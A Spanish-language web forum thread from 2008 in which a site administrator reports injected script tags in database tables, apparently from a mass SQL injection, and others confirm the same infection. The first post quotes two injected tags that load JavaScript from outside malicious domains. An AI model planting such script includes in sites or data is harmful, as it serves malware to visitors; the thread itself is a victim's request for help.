Foros del Web » Soporte técnico » Virus, troyanos y spyware »

Codigo Javascript en base de datos (sslnet72.com o encode72.com)

Estas en el tema de Codigo Javascript en base de datos (sslnet72.com o encode72.com) en el foro de Virus, troyanos y spyware en Foros del Web. Hola, tengo un inconveniente en una aplicación en la cual trabajo, hace ya unos días atrás el sitio se vio afectado en su funcionamiento debido ...
  #1 (permalink)  
Antiguo 09/06/2008, 07:58
Avatar de maderic_m  
Fecha de Ingreso: agosto-2007
Mensajes: 53
Antigüedad: 16 años, 8 meses
Puntos: 0
Codigo Javascript en base de datos (sslnet72.com o encode72.com)

Hola, tengo un inconveniente en una aplicación en la cual trabajo, hace ya unos días atrás el sitio se vio afectado en su funcionamiento debido a que en dos tablas de mi base de datos se incluyeron códigos javascript, ósea es html que llama a un js externo, a continuación dejo alguno de los tags que se incluyeron:

<script src=http://www.sslnet72.com/b.js></script>
<script src=http://www.encode72.com/b.js></script>

estas fueron las principales, ósea es como al que al contenido de ciertos atributos de algunas tablas se le concateno eso, alguna idea de si eso puede venir de una inyección SQL, algún virus que se conozca en el cliente o servidor?? O algo así? si buscan la dirección (sslnet72.com o encode72.com ) en Google hay miles de sitios infectados con lo mismo, bueno los dejo un abrazo
  #2 (permalink)  
Antiguo 09/06/2008, 08:33
Avatar de maderic_m  
Fecha de Ingreso: agosto-2007
Mensajes: 53
Antigüedad: 16 años, 8 meses
Puntos: 0
Respuesta: Codigo Javascript en base de datos (sslnet72.com o encode72.com)

aca les dejo el siguiente link estos se pusieron a seguir el script y terminan con esto , todo parece una inyeccion SQL, todavia no puedo decodificar el html ese, pero lo mas seguro es que cuando uno visite un sitio de con los includes javascipt esos se le descargue algun malware o spyware.
  #3 (permalink)  
Antiguo 10/06/2008, 06:07
 
Fecha de Ingreso: marzo-2007
Mensajes: 89
Antigüedad: 17 años, 1 mes
Puntos: 0
Respuesta: Codigo Javascript en base de datos (sslnet72.com o encode72.com)

Hola maderic_m, no eres el único al que le ha pasado. Yo también tengo ese mismo problema y me he estado postenado con otro usuario. Entre los dos hemos conseguido retener un poco esa infeccion. Aqui te dejo el enlace para que le eches un vistazo.

Saludos
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 13:14.